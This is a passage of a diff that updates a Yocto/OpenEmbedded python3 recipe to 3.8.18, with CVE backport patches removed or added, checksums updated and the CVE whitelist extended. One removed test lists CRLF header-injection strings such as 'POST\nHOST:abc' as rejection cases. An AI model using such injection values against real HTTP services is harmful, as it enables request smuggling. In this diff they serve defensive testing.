235diff --git a/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst b/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
236new file mode 100644
237index 0000000000..9f2800581c
238--- /dev/null
239+++ b/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
240@@ -0,0 +1,5 @@
241+CVE-2020-8492: The :class:`~urllib.request.AbstractBasicAuthHandler` class of the
242+:mod:`urllib.request` module uses an inefficient regular expression which can
243+be exploited by an attacker to cause a denial of service. Fix the regex to
244+prevent the catastrophic backtracking. Vulnerability reported by Ben Caller
245+and Matt Schwager.
246--
2472.24.1
248
diff --git a/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch b/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch
new file mode 100644
index 0000000000..a44d3396a6
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch
@@ -0,0 +1,33 @@
1From 7a2bddfa437be633bb6945d0e6b7d6f27da870ad Mon Sep 17 00:00:00 2001
2From: Tim Orling <timothy.t.orling@intel.com>
3Date: Fri, 18 Jun 2021 11:56:50 -0700
4Subject: [PATCH] test_ctypes.test_find: skip without tools-sdk
5
6These tests need full packagegroup-core-buildessential, the
7easiest way to dynamically check for that is looking for
8'tools-sdk' in IMAGE_FEATURES.
9
10Upstream-Status: Inappropriate [oe-specific]
11
12Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
13---
14 Lib/ctypes/test/test_find.py | 2 ++
15 1 file changed, 2 insertions(+)
16
17diff --git a/Lib/ctypes/test/test_find.py b/Lib/ctypes/test/test_find.py
18index 92ac184..0d009d1 100644
19--- a/Lib/ctypes/test/test_find.py
20+++ b/Lib/ctypes/test/test_find.py
21@@ -112,10 +112,12 @@ class FindLibraryLinux(unittest.TestCase):
22 # LD_LIBRARY_PATH)
23 self.assertEqual(find_library(libname), 'lib%s.so' % libname)
24
25+ @unittest.skip("Needs IMAGE_FEATURES += \"tools-sdk\"")
26 def test_find_library_with_gcc(self):
27 with unittest.mock.patch("ctypes.util._findSoname_ldconfig", lambda *args: None):
28 self.assertNotEqual(find_library('c'), None)
29
30+ @unittest.skip("Needs IMAGE_FEATURES += \"tools-sdk\"")
31 def test_find_library_with_ld(self):
32 with unittest.mock.patch("ctypes.util._findSoname_ldconfig", lambda *args: None), \
33 unittest.mock.patch("ctypes.util._findLib_gcc", lambda *args: None):
diff --git a/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch b/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
index 35b7e0c480..f9d2eadc11 100644
--- a/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
+++ b/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
@@ -1,6 +1,6 @@
1From b94995e0c694ec9561efec0d1a59b323340e6105 Mon Sep 17 00:00:00 2001 1From e11787d373baa6d7b0e0d94aff8ccd373203bfb1 Mon Sep 17 00:00:00 2001
2From: Mingli Yu <mingli.yu@windriver.com> 2From: Tim Orling <ticotimo@gmail.com>
3Date: Mon, 5 Aug 2019 15:57:39 +0800 3Date: Wed, 16 Jun 2021 07:49:52 -0700
4Subject: [PATCH] test_locale.py: correct the test output format 4Subject: [PATCH] test_locale.py: correct the test output format
5 5
6Before this patch: 6Before this patch:
@@ -24,23 +24,25 @@ Before this patch:
24Upstream-Status: Submitted [https://github.com/python/cpython/pull/15132] 24Upstream-Status: Submitted [https://github.com/python/cpython/pull/15132]
25 25
26Signed-off-by: Mingli Yu <mingli.yu@windriver.com> 26Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
27
28
29Refresh patch for upstream changes in 3.8.9
30
31Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
27--- 32---
28 Lib/test/test_locale.py | 2 +- 33 Lib/test/test_locale.py | 2 +-
29 1 file changed, 1 insertion(+), 1 deletion(-) 34 1 file changed, 1 insertion(+), 1 deletion(-)
30 35
31diff --git a/Lib/test/test_locale.py b/Lib/test/test_locale.py 36diff --git a/Lib/test/test_locale.py b/Lib/test/test_locale.py
32index e2c2178..558d63c 100644 37index 39091c0..5050f3d 100644
33--- a/Lib/test/test_locale.py 38--- a/Lib/test/test_locale.py
34+++ b/Lib/test/test_locale.py 39+++ b/Lib/test/test_locale.py
35@@ -527,7 +527,7 @@ class TestMiscellaneous(unittest.TestCase): 40@@ -563,7 +563,7 @@ class TestMiscellaneous(unittest.TestCase):
36 self.skipTest('test needs Turkish locale') 41 self.skipTest('test needs Turkish locale')
37 loc = locale.getlocale(locale.LC_CTYPE) 42 loc = locale.getlocale(locale.LC_CTYPE)
38 if verbose: 43 if verbose:
39- print('testing with %a' % (loc,), end=' ', flush=True) 44- print('testing with %a' % (loc,), end=' ', flush=True)
40+ print('testing with %a...' % (loc,), end=' ', flush=True) 45+ print('testing with %a...' % (loc,), end=' ', flush=True)
41 locale.setlocale(locale.LC_CTYPE, loc) 46 try:
42 self.assertEqual(loc, locale.getlocale(locale.LC_CTYPE)) 47 locale.setlocale(locale.LC_CTYPE, loc)
43 48 except locale.Error as exc:
44--
452.7.4
46
diff --git a/meta/recipes-devtools/python/python3/CVE-2019-20907.patch b/meta/recipes-devtools/python/python3/CVE-2019-20907.patch
deleted file mode 100644
index a2e72372dd..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2019-20907.patch
+++ /dev/null
@@ -1,44 +0,0 @@
1From a06a6bf4e67a50561f6d6fb33534df1d3035ea34 Mon Sep 17 00:00:00 2001
2From: Rishi <rishi_devan@mail.com>
3Date: Wed, 15 Jul 2020 13:51:00 +0200
4Subject: [PATCH] bpo-39017: Avoid infinite loop in the tarfile module
5 (GH-21454)
6
7Avoid infinite loop when reading specially crafted TAR files using the tarfile module
8(CVE-2019-20907).
9(cherry picked from commit 5a8d121a1f3ef5ad7c105ee378cc79a3eac0c7d4)
10
11Co-authored-by: Rishi <rishi_devan@mail.com>
12
13Removed testing 'recursion.tar' tar file due to binary data
14
15Upstream-Status: Backport [https://github.com/python/cpython/commit/c55479556db015f48fc8bbca17f64d3e65598559]
16CVE: CVE-2019-20907
17Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
18---
19 Lib/tarfile.py | 2 ++
20 .../2020-07-12-22-16-58.bpo-39017.x3Cg-9.rst | 1 +
21 4 files changed, 10 insertions(+)
22 create mode 100644 Lib/test/recursion.tar
23 create mode 100644 Misc/NEWS.d/next/Library/2020-07-12-22-16-58.bpo-39017.x3Cg-9.rst
24
25diff --git a/Lib/tarfile.py b/Lib/tarfile.py
26index d31b9cbb51d65..7a69e1b1aa544 100755
27--- a/Lib/tarfile.py
28+++ b/Lib/tarfile.py
29@@ -1241,6 +1241,8 @@ def _proc_pax(self, tarfile):
30
31 length, keyword = match.groups()
32 length = int(length)
33+ if length == 0:
34+ raise InvalidHeaderError("invalid header")
35 value = buf[match.end(2) + 1:match.start(1) + length - 1]
36
37 # Normally, we could just use "utf-8" as the encoding and "strict"
38diff --git a/Misc/NEWS.d/next/Library/2020-07-12-22-16-58.bpo-39017.x3Cg-9.rst b/Misc/NEWS.d/next/Library/2020-07-12-22-16-58.bpo-39017.x3Cg-9.rst
39new file mode 100644
40index 0000000000000..ad26676f8b856
41--- /dev/null
42+++ b/Misc/NEWS.d/next/Library/2020-07-12-22-16-58.bpo-39017.x3Cg-9.rst
43@@ -0,0 +1 @@
44+Avoid infinite loop when reading specially crafted TAR files using the tarfile module (CVE-2019-20907).
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-14422.patch b/meta/recipes-devtools/python/python3/CVE-2020-14422.patch
deleted file mode 100644
index 6889e46da9..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-14422.patch
+++ /dev/null
@@ -1,77 +0,0 @@
1From dc8ce8ead182de46584cc1ed8a8c51d48240cbd5 Mon Sep 17 00:00:00 2001
2From: "Miss Islington (bot)"
3 <31488909+miss-islington@users.noreply.github.com>
4Date: Mon, 29 Jun 2020 11:12:50 -0700
5Subject: [PATCH] bpo-41004: Resolve hash collisions for IPv4Interface and
6 IPv6Interface (GH-21033)
7
8The __hash__() methods of classes IPv4Interface and IPv6Interface had issue
9of generating constant hash values of 32 and 128 respectively causing hash collisions.
10The fix uses the hash() function to generate hash values for the objects
11instead of XOR operation
12(cherry picked from commit b30ee26e366bf509b7538d79bfec6c6d38d53f28)
13
14Co-authored-by: Ravi Teja P <rvteja92@gmail.com>
15
16Upstream-Status: Backport [https://github.com/python/cpython/commit/dc8ce8ead182de46584cc1ed8a8c51d48240cbd5]
17CVE: CVE-2020-14422
18Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
19---
20 Lib/ipaddress.py | 4 ++--
21 Lib/test/test_ipaddress.py | 12 ++++++++++++
22 .../2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst | 1 +
23 3 files changed, 15 insertions(+), 2 deletions(-)
24 create mode 100644 Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
25
26diff --git a/Lib/ipaddress.py b/Lib/ipaddress.py
27index 873c7644081af..a3a04f7f4b309 100644
28--- a/Lib/ipaddress.py
29+++ b/Lib/ipaddress.py
30@@ -1370,7 +1370,7 @@ def __lt__(self, other):
31 return False
32
33 def __hash__(self):
34- return self._ip ^ self._prefixlen ^ int(self.network.network_address)
35+ return hash((self._ip, self._prefixlen, int(self.network.network_address)))
36
37 __reduce__ = _IPAddressBase.__reduce__
38
39@@ -2017,7 +2017,7 @@ def __lt__(self, other):
40 return False
41
42 def __hash__(self):
43- return self._ip ^ self._prefixlen ^ int(self.network.network_address)
44+ return hash((self._ip, self._prefixlen, int(self.network.network_address)))
45
46 __reduce__ = _IPAddressBase.__reduce__
47
48diff --git a/Lib/test/test_ipaddress.py b/Lib/test/test_ipaddress.py
49index de77111705b69..2eba740e5e7a4 100644
50--- a/Lib/test/test_ipaddress.py
51+++ b/Lib/test/test_ipaddress.py
52@@ -2053,6 +2053,18 @@ def testsixtofour(self):
53 sixtofouraddr.sixtofour)
54 self.assertFalse(bad_addr.sixtofour)
55
56+ # issue41004 Hash collisions in IPv4Interface and IPv6Interface
57+ def testV4HashIsNotConstant(self):
58+ ipv4_address1 = ipaddress.IPv4Interface("1.2.3.4")
59+ ipv4_address2 = ipaddress.IPv4Interface("2.3.4.5")
60+ self.assertNotEqual(ipv4_address1.__hash__(), ipv4_address2.__hash__())
61+
62+ # issue41004 Hash collisions in IPv4Interface and IPv6Interface
63+ def testV6HashIsNotConstant(self):
64+ ipv6_address1 = ipaddress.IPv6Interface("2001:658:22a:cafe:200:0:0:1")
65+ ipv6_address2 = ipaddress.IPv6Interface("2001:658:22a:cafe:200:0:0:2")
66+ self.assertNotEqual(ipv6_address1.__hash__(), ipv6_address2.__hash__())
67+
68
69 if __name__ == '__main__':
70 unittest.main()
71diff --git a/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst b/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
72new file mode 100644
73index 0000000000000..1380b31fbe9f4
74--- /dev/null
75+++ b/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
76@@ -0,0 +1 @@
77+The __hash__() methods of ipaddress.IPv4Interface and ipaddress.IPv6Interface incorrectly generated constant hash values of 32 and 128 respectively. This resulted in always causing hash collisions. The fix uses hash() to generate hash values for the tuple of (address, mask length, network address).
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-26116.patch b/meta/recipes-devtools/python/python3/CVE-2020-26116.patch
deleted file mode 100644
index c019db2a76..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-26116.patch
+++ /dev/null
@@ -1,104 +0,0 @@
1From 668d321476d974c4f51476b33aaca870272523bf Mon Sep 17 00:00:00 2001
2From: "Miss Islington (bot)"
3 <31488909+miss-islington@users.noreply.github.com>
4Date: Sat, 18 Jul 2020 13:39:12 -0700
5Subject: [PATCH] bpo-39603: Prevent header injection in http methods
6 (GH-18485)
7
8reject control chars in http method in http.client.putrequest to prevent http header injection
9(cherry picked from commit 8ca8a2e8fb068863c1138f07e3098478ef8be12e)
10
11Co-authored-by: AMIR <31338382+amiremohamadi@users.noreply.github.com>
12
13Upstream-Status: Backport [https://github.com/python/cpython/commit/668d321476d974c4f51476b33aaca870272523bf]
14CVE: CVE-2020-26116
15Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
16
17---
18 Lib/http/client.py | 15 +++++++++++++
19 Lib/test/test_httplib.py | 22 +++++++++++++++++++
20 .../2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst | 2 ++
21 3 files changed, 39 insertions(+)
22 create mode 100644 Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
23
24diff --git a/Lib/http/client.py b/Lib/http/client.py
25index 019380a720318..c2ad0471bfee5 100644
26--- a/Lib/http/client.py
27+++ b/Lib/http/client.py
28@@ -147,6 +147,10 @@
29 # _is_allowed_url_pchars_re = re.compile(r"^[/!$&'()*+,;=:@%a-zA-Z0-9._~-]+$")
30 # We are more lenient for assumed real world compatibility purposes.
31
32+# These characters are not allowed within HTTP method names
33+# to prevent http header injection.
34+_contains_disallowed_method_pchar_re = re.compile('[\x00-\x1f]')
35+
36 # We always set the Content-Length header for these methods because some
37 # servers will otherwise respond with a 411
38 _METHODS_EXPECTING_BODY = {'PATCH', 'POST', 'PUT'}
39@@ -1087,6 +1091,8 @@ def putrequest(self, method, url, skip_host=False,
40 else:
41 raise CannotSendRequest(self.__state)
42
43+ self._validate_method(method)
44+
45 # Save the method for use later in the response phase
46 self._method = method
47
48@@ -1177,6 +1183,15 @@ def _encode_request(self, request):
49 # ASCII also helps prevent CVE-2019-9740.
50 return request.encode('ascii')
51
52+ def _validate_method(self, method):
53+ """Validate a method name for putrequest."""
54+ # prevent http header injection
55+ match = _contains_disallowed_method_pchar_re.search(method)
56+ if match:
57+ raise ValueError(
58+ f"method can't contain control characters. {method!r} "
59+ f"(found at least {match.group()!r})")
60+
61 def _validate_path(self, url):
62 """Validate a url for putrequest."""
63 # Prevent CVE-2019-9740.
64diff --git a/Lib/test/test_httplib.py b/Lib/test/test_httplib.py
65index 8f0e27a1fb836..5a5fcecbc9c15 100644
66--- a/Lib/test/test_httplib.py
67+++ b/Lib/test/test_httplib.py
68@@ -364,6 +364,28 @@ def test_headers_debuglevel(self):
69 self.assertEqual(lines[3], "header: Second: val2")
70
71
72+class HttpMethodTests(TestCase):
73+ def test_invalid_method_names(self):
74+ methods = (
75+ 'GET\r',
76+ 'POST\n',
77+ 'PUT\n\r',
78+ 'POST\nValue',
79+ 'POST\nHOST:abc',
80+ 'GET\nrHost:abc\n',
81+ 'POST\rRemainder:\r',
82+ 'GET\rHOST:\n',
83+ '\nPUT'
84+ )
85+
86+ for method in methods:
87+ with self.assertRaisesRegex(
88+ ValueError, "method can't contain control characters"):
89+ conn = client.HTTPConnection('example.com')
90+ conn.sock = FakeSocket(None)
91+ conn.request(method=method, url="/")
92+
93+
94 class TransferEncodingTest(TestCase):
95 expected_body = b"It's just a flesh wound"
96
97diff --git a/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst b/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
98new file mode 100644
99index 0000000000000..990affc3edd9d
100--- /dev/null
101+++ b/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
102@@ -0,0 +1,2 @@
103+Prevent http header injection by rejecting control characters in
104+http.client.putrequest(...).
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-27619.patch b/meta/recipes-devtools/python/python3/CVE-2020-27619.patch
deleted file mode 100644
index bafa1cb999..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-27619.patch
+++ /dev/null
@@ -1,70 +0,0 @@
1From 6c6c256df3636ff6f6136820afaefa5a10a3ac33 Mon Sep 17 00:00:00 2001
2From: "Miss Skeleton (bot)" <31488909+miss-islington@users.noreply.github.com>
3Date: Tue, 6 Oct 2020 05:38:54 -0700
4Subject: [PATCH] bpo-41944: No longer call eval() on content received via HTTP
5 in the CJK codec tests (GH-22566) (GH-22577)
6
7(cherry picked from commit 2ef5caa58febc8968e670e39e3d37cf8eef3cab8)
8
9Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
10
11Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
12
13Upstream-Status: Backport [https://github.com/python/cpython/commit/6c6c256df3636ff6f6136820afaefa5a10a3ac33]
14CVE: CVE-2020-27619
15Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
16---
17 Lib/test/multibytecodec_support.py | 22 +++++++------------
18 .../2020-10-05-17-43-46.bpo-41944.rf1dYb.rst | 1 +
19 2 files changed, 9 insertions(+), 14 deletions(-)
20 create mode 100644 Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
21
22diff --git a/Lib/test/multibytecodec_support.py b/Lib/test/multibytecodec_support.py
23index cca8af67d6d1d..f76c0153f5ecf 100644
24--- a/Lib/test/multibytecodec_support.py
25+++ b/Lib/test/multibytecodec_support.py
26@@ -305,29 +305,23 @@ def test_mapping_file(self):
27 self._test_mapping_file_plain()
28
29 def _test_mapping_file_plain(self):
30- unichrs = lambda s: ''.join(map(chr, map(eval, s.split('+'))))
31+ def unichrs(s):
32+ return ''.join(chr(int(x, 16)) for x in s.split('+'))
33+
34 urt_wa = {}
35
36 with self.open_mapping_file() as f:
37 for line in f:
38 if not line:
39 break
40- data = line.split('#')[0].strip().split()
41+ data = line.split('#')[0].split()
42 if len(data) != 2:
43 continue
44
45- csetval = eval(data[0])
46- if csetval <= 0x7F:
47- csetch = bytes([csetval & 0xff])
48- elif csetval >= 0x1000000:
49- csetch = bytes([(csetval >> 24), ((csetval >> 16) & 0xff),
50- ((csetval >> 8) & 0xff), (csetval & 0xff)])
51- elif csetval >= 0x10000:
52- csetch = bytes([(csetval >> 16), ((csetval >> 8) & 0xff),
53- (csetval & 0xff)])
54- elif csetval >= 0x100:
55- csetch = bytes([(csetval >> 8), (csetval & 0xff)])
56- else:
57+ if data[0][:2] != '0x':
58+ self.fail(f"Invalid line: {line!r}")
59+ csetch = bytes.fromhex(data[0][2:])
60+ if len(csetch) == 1 and 0x80 <= csetch[0]:
61 continue
62
63 unich = unichrs(data[1])
64diff --git a/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst b/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
65new file mode 100644
66index 0000000000000..4f9782f1c85af
67--- /dev/null
68+++ b/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
69@@ -0,0 +1 @@
70+Tests for CJK codecs no longer call ``eval()`` on content received via HTTP.
diff --git a/meta/recipes-devtools/python/python3/CVE-2023-24329.patch b/meta/recipes-devtools/python/python3/CVE-2023-24329.patch
new file mode 100644
index 0000000000..23dec65602
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/CVE-2023-24329.patch
@@ -0,0 +1,80 @@
1From 72d356e3584ebfb8e813a8e9f2cd3dccf233c0d9 Mon Sep 17 00:00:00 2001
2From: "Miss Islington (bot)"
3 <31488909+miss-islington@users.noreply.github.com>
4Date: Sun, 13 Nov 2022 11:00:25 -0800
5Subject: [PATCH] gh-99418: Make urllib.parse.urlparse enforce that a scheme
6 must begin with an alphabetical ASCII character. (GH-99421)
7
8Prevent urllib.parse.urlparse from accepting schemes that don't begin with an alphabetical ASCII character.
9
10RFC 3986 defines a scheme like this: `scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )`
11RFC 2234 defines an ALPHA like this: `ALPHA = %x41-5A / %x61-7A`
12
13The WHATWG URL spec defines a scheme like this:
14`"A URL-scheme string must be one ASCII alpha, followed by zero or more of ASCII alphanumeric, U+002B (+), U+002D (-), and U+002E (.)."`
15(cherry picked from commit 439b9cfaf43080e91c4ad69f312f21fa098befc7)
16
17Co-authored-by: Ben Kallus <49924171+kenballus@users.noreply.github.com>
18
19Upstream-Status: Backport [https://github.com/python/cpython/commit/72d356e3584ebfb8e813a8e9f2cd3dccf233c0d9]
20CVE: CVE-2023-24329
21Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
22---
23 Lib/test/test_urlparse.py | 18 ++++++++++++++++++
24 Lib/urllib/parse.py | 2 +-
25 ...22-11-12-15-45-51.gh-issue-99418.FxfAXS.rst | 2 ++
26 3 files changed, 21 insertions(+), 1 deletion(-)
27 create mode 100644 Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
28
29diff --git a/Lib/test/test_urlparse.py b/Lib/test/test_urlparse.py
30index 0ad3bf1..e1aa913 100644
31--- a/Lib/test/test_urlparse.py
32+++ b/Lib/test/test_urlparse.py
33@@ -735,6 +735,24 @@ class UrlParseTestCase(unittest.TestCase):
34 with self.assertRaises(ValueError):
35 p.port
36
37+ def test_attributes_bad_scheme(self):
38+ """Check handling of invalid schemes."""
39+ for bytes in (False, True):
40+ for parse in (urllib.parse.urlsplit, urllib.parse.urlparse):
41+ for scheme in (".", "+", "-", "0", "http&", "६http"):
42+ with self.subTest(bytes=bytes, parse=parse, scheme=scheme):
43+ url = scheme + "://www.example.net"
44+ if bytes:
45+ if url.isascii():
46+ url = url.encode("ascii")
47+ else:
48+ continue
49+ p = parse(url)
50+ if bytes:
51+ self.assertEqual(p.scheme, b"")
52+ else:
53+ self.assertEqual(p.scheme, "")
54+
55 def test_attributes_without_netloc(self):
56 # This example is straight from RFC 3261. It looks like it
57 # should allow the username, hostname, and port to be filled
58diff --git a/Lib/urllib/parse.py b/Lib/urllib/parse.py
59index 979e6d2..2e7a3e2 100644
60--- a/Lib/urllib/parse.py
61+++ b/Lib/urllib/parse.py
62@@ -452,7 +452,7 @@ def urlsplit(url, scheme='', allow_fragments=True):
63 clear_cache()
64 netloc = query = fragment = ''
65 i = url.find(':')
66- if i > 0:
67+ if i > 0 and url[0].isascii() and url[0].isalpha():
68 if url[:i] == 'http': # optimize the common case
69 url = url[i+1:]
70 if url[:2] == '//':
71diff --git a/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst b/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
72new file mode 100644
73index 0000000..0a06e7c
74--- /dev/null
75+++ b/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
76@@ -0,0 +1,2 @@
77+Fix bug in :func:`urllib.parse.urlparse` that causes URL schemes that begin
78+with a digit, a plus sign, or a minus sign to be parsed incorrectly.
79--
802.25.1
diff --git a/meta/recipes-devtools/python/python3/makerace.patch b/meta/recipes-devtools/python/python3/makerace.patch
new file mode 100644
index 0000000000..8971f28b8e
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/makerace.patch
@@ -0,0 +1,23 @@
1libainstall installs python-config.py but the .pyc cache files are generated
2by the libinstall target. This means some builds may not generate the pyc files
3for python-config.py depending on the order things happen in. This means builds
4are not always reproducible.
5
6Add a dependency to avoid the race.
7
8Upstream-Status: Pending
9Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
10
11Index: Python-3.8.11/Makefile.pre.in
12===================================================================
13--- Python-3.8.11.orig/Makefile.pre.in
14+++ Python-3.8.11/Makefile.pre.in
15@@ -1415,7 +1415,7 @@ LIBSUBDIRS= tkinter tkinter/test tkinter
16 unittest unittest/test unittest/test/testmock \
17 venv venv/scripts venv/scripts/common venv/scripts/posix \
18 curses pydoc_data
19-libinstall: build_all $(srcdir)/Modules/xxmodule.c
20+libinstall: build_all $(srcdir)/Modules/xxmodule.c libainstall
21 @for i in $(SCRIPTDIR) $(LIBDEST); \
22 do \
23 if test ! -d $(DESTDIR)$$i; then \
diff --git a/meta/recipes-devtools/python/python3/python3-manifest.json b/meta/recipes-devtools/python/python3/python3-manifest.json
index 3bcc9b8662..0e87f91dd8 100644
--- a/meta/recipes-devtools/python/python3/python3-manifest.json
+++ b/meta/recipes-devtools/python/python3/python3-manifest.json
@@ -531,7 +531,9 @@
531 "rdepends": [ 531 "rdepends": [
532 "core" 532 "core"
533 ], 533 ],
534 "files": [], 534 "files": [
535 "${libdir}/python${PYTHON_MAJMIN}/distutils/command/wininst-*.exe"
536 ],
535 "cached": [] 537 "cached": []
536 }, 538 },
537 "distutils": { 539 "distutils": {
diff --git a/meta/recipes-devtools/python/python3_3.8.2.bb b/meta/recipes-devtools/python/python3_3.8.18.bb
index a448b3ed97..9d0f72ecf9 100644
--- a/meta/recipes-devtools/python/python3_3.8.2.bb
+++ b/meta/recipes-devtools/python/python3_3.8.18.bb
@@ -1,9 +1,10 @@
1SUMMARY = "The Python Programming Language" 1SUMMARY = "The Python Programming Language"
2HOMEPAGE = "http://www.python.org" 2HOMEPAGE = "http://www.python.org"
3LICENSE = "PSFv2" 3DESCRIPTION = "Python is a programming language that lets you work more quickly and integrate your systems more effectively."
4LICENSE = "PSF-2.0 & BSD-0-Clause"
4SECTION = "devel/python" 5SECTION = "devel/python"
5 6
6LIC_FILES_CHKSUM = "file://LICENSE;md5=203a6dbc802ee896020a47161e759642" 7LIC_FILES_CHKSUM = "file://LICENSE;md5=07fc4b9a9c0c0e48050ed38a5e72552b"
7 8
8SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \ 9SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
9 file://run-ptest \ 10 file://run-ptest \
@@ -32,11 +33,8 @@ SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
32 file://0001-configure.ac-fix-LIBPL.patch \ 33 file://0001-configure.ac-fix-LIBPL.patch \
33 file://0001-python3-Do-not-hardcode-lib-for-distutils.patch \ 34 file://0001-python3-Do-not-hardcode-lib-for-distutils.patch \
34 file://0020-configure.ac-setup.py-do-not-add-a-curses-include-pa.patch \ 35 file://0020-configure.ac-setup.py-do-not-add-a-curses-include-pa.patch \
35 file://0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch \ 36 file://makerace.patch \
36 file://CVE-2019-20907.patch \ 37 file://CVE-2023-24329.patch \
37 file://CVE-2020-14422.patch \
38 file://CVE-2020-26116.patch \
39 file://CVE-2020-27619.patch \
40 " 38 "
41 39
42SRC_URI_append_class-native = " \ 40SRC_URI_append_class-native = " \
@@ -45,8 +43,8 @@ SRC_URI_append_class-native = " \
45 file://0001-Don-t-search-system-for-headers-libraries.patch \ 43 file://0001-Don-t-search-system-for-headers-libraries.patch \
46 " 44 "
47 45
48SRC_URI[md5sum] = "e9d6ebc92183a177b8e8a58cad5b8d67" 46SRC_URI[md5sum] = "5ea6267ea00513fc31d3746feb35842d"
49SRC_URI[sha256sum] = "2646e7dc233362f59714c6193017bb2d6f7b38d6ab4a0cb5fbac5c36c4d845df" 47SRC_URI[sha256sum] = "3ffb71cd349a326ba7b2fadc7e7df86ba577dd9c4917e52a8401adbda7405e3f"
50 48
51# exclude pre-releases for both python 2.x and 3.x 49# exclude pre-releases for both python 2.x and 3.x
52UPSTREAM_CHECK_REGEX = "[Pp]ython-(?P<pver>\d+(\.\d+)+).tar" 50UPSTREAM_CHECK_REGEX = "[Pp]ython-(?P<pver>\d+(\.\d+)+).tar"
@@ -59,7 +57,12 @@ CVE_CHECK_WHITELIST += "CVE-2007-4559"
59CVE_CHECK_WHITELIST += "CVE-2019-18348" 57CVE_CHECK_WHITELIST += "CVE-2019-18348"
60 58
61# This is windows only issue. 59# This is windows only issue.
62CVE_CHECK_WHITELIST += "CVE-2020-15523" 60CVE_CHECK_WHITELIST += "CVE-2020-15523 CVE-2022-26488"
61# The mailcap module is insecure by design, so this can't be fixed in a meaningful way.
62# The module will be removed in the future and flaws documented.
63CVE_CHECK_WHITELIST += "CVE-2015-20107"
64# Not an issue, in fact expected behaviour
65CVE_CHECK_WHITELIST += "CVE-2023-36632"
63 66
64PYTHON_MAJMIN = "3.8" 67PYTHON_MAJMIN = "3.8"
65 68
@@ -76,7 +79,7 @@ ALTERNATIVE_LINK_NAME[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config
76ALTERNATIVE_TARGET[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config-${MULTILIB_SUFFIX}" 79ALTERNATIVE_TARGET[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config-${MULTILIB_SUFFIX}"
77 80
78 81
79DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2" 82DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2 autoconf-archive"
80DEPENDS_append_class-target = " python3-native" 83DEPENDS_append_class-target = " python3-native"
81DEPENDS_append_class-nativesdk = " python3-native" 84DEPENDS_append_class-nativesdk = " python3-native"
82 85
@@ -335,6 +338,7 @@ PACKAGES =+ "libpython3 libpython3-staticdev"
335FILES_libpython3 = "${libdir}/libpython*.so.*" 338FILES_libpython3 = "${libdir}/libpython*.so.*"
